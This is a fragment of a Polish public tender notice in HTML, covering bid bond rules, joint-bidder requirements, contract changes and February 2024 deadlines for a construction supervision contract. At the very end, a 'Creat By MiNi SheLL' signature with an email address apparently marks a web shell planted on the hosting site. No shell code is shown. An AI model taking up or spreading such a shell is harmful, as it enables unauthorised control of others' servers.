ustawy Pzp lub Podwykonawcy niebędącego podmiotem udostępniającym zasoby na takich zasadach; <br/>3) Pełnomocnictwo upoważniające do złożenia oferty (jeśli dotyczy); <br/>4) Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - o ile ofertę składają Wykonawcy wspólnie ubiegający się o udzielenie zamówienia np. konsorcjum, spółki cywilne; <br/>5) Zobowiązanie podmiotu udostępniającego zasoby, na których zdolności techniczne lub zawodowe lub sytuację finansową lub ekonomiczną Wykonawca się powołuje w celu potwierdzenia spełniania warunków udziału w postępowaniu lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie będzie dysponował niezbędnymi zasobami tych podmiotów (jeśli dotyczy). Wzór zobowiązania zawarto w załączniku nr 3 do SWZ; <br/>6) Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, o którym mowa w art. 117 ust. 4 ustawy Pzp (składają wykonawcy wspólnie ubiegający się o udzielenie zamówienia). Wzór oświadczenia zawarto w załączniku nr 5 do SWZ; <br/>7) Informacje dot. tajemnicy przedsiębiorstwa wraz z uzasadnieniem spełniania przesłanek określonych w art. 11 ust. 2 ustawy o zwalczaniu nieuczciwej konkurencji (jeśli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest zabezpieczyć złożoną na zadanie 1 ofertę częściową poprzez wniesienie wadium w wysokości:<br/>Zadanie 1 -1 500,00 zł<br/>słownie: tysiąc pięćset złotych 00/100.<br/>Na pozostałe Zadania (części zamówienia) Zamawiający nie wymaga zabezpieczenia oferty wadium.<br/>2.	Wadium może być wniesione w formach określonych w art. 97 ust. 7 ustawy pzp w zależności od wyboru wykonawcy:<br/>Formy wniesienia wadium:<br/>a)	w pieniądzu, wpłacone przelewem na rachunek bankowy Zamawiającego: <br/>BS O/Brodnica 92 9484 1150 2200 0001 6598 0110 z adnotacją Wadium na: <br/>„Przetarg na nadzór inwestorski – Zadanie nr 1”<br/>b)	gwarancjach bankowych;<br/>c)	gwarancjach ubezpieczeniowych;<br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r., poz. 310, 836 i 1572).<br/>3.	W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.<br/>4.	Jeżeli wadium jest wnoszone w innej formie niż w pieniądzu Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>5.	W przypadku wniesienia wadium w formie gwarancji bankowej lub ubezpieczeniowej, gwarancja musi być gwarancją nieodwołalną, bezwarunkową i płatną na pierwsze żądanie zamawiającego, sporządzoną zgodnie z obowiązującymi przepisami prawa i powinna zawierać następujące elementy:<br/>a) nazwę wykonawcy, beneficjenta gwarancji (zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielającej gwarancji) oraz wskazanie ich siedzib,<br/>b) kwotę gwarancji,<br/>c) termin ważności gwarancji „ od dnia ………… do dnia ……………”<br/>d) zobowiązanie gwaranta do zapłacenie kwoty gwarancji na pierwsze żądanie zamawiającego w sytuacjach określonych w art. 98 ust. 6 ustawy.<br/>6.	Wadium musi zabezpieczać ofertę przez cały okres związania ofertą, począwszy od dnia, <br/>w którym upływa termin składania ofert.<br/>7.	Zasady wnoszenia wadium określone w niniejszym rozdziale dotyczą również przedłużenia ważności wadium oraz wnoszenia nowego wadium w przypadkach określonych w ustawie pzp.<br/>8.	Nie wniesienie wadium w terminie lub w sposób określony w SWZ lub nieutrzymywanie nieprzerwanie wadium do upływu terminu związania ofertą spowoduje odrzucenie oferty Wykonawcy na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>9.	Zamawiający zwraca wadium zgodnie z zasadami określonymi w art. 98 ust. 1-5 ustawy Pzp.<br/>10.	Złożenia wniosku o zwrot wadium powoduje rozwiązanie stosunku prawnego z Wykonawcą wraz z utrata przez niego prawa do korzystania ze środków ochrony prawnej.<br/>11.	Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie niepieniężnej, wystąpi odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, jeżeli:<br/>1) Wykonawca w odpowiedzi na wezwanie, z przyczyn lezących po jego stronie, nie złożył podmiotowych środków dowodowych lub przedmiotowych środków dowodowych potwierdzających spełnianie warunków udziału w postepowaniu i brak podstaw wykluczenia, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty jako najkorzystniejszej;<br/>2) Wykonawca, którego oferta została wybrana:<br/>a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,<br/>b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;<br/>3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, którego oferta została wybrana. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia i w takim przypadku ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego.<br/>2.	Każdy z Wykonawców wspólnie ubiegających się o zamówienie zobowiązani są do załączenia do oferty oświadczenia z art. 125 ust 1 ustawy pzp o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu w zakresie, w jakim dany Wykonawca wykazuje spełnianie warunków – wzór oświadczenia stanowi załącznik nr 2 do SWZ; W oświadczeniu każdy z Wykonawców wskazuje jednostkę redakcyjną opisanego warunku z dokumentu SWZ, którego spełnianie wykazuje.<br/>3.	Wykonawcy wspólnie ubiegających się o zamówienie zobowiązani są załączyć do oferty oświadczenie z art. 117 ust. 4 z informacją, które usługi wykonają poszczególni Wykonawcy. Wzór oświadczenia stanowi załącznik nr 5 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający określił katalog dopuszczalnych zmian umów zawartych na wykonanie poszczególnych nadzorów (zadań) w § 11 każdego wzoru umowy (załączniki 6,7,8 na zadanie od 1 do 3). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-02-15 11:10</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma eZamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-02-15 11:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-03-15</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com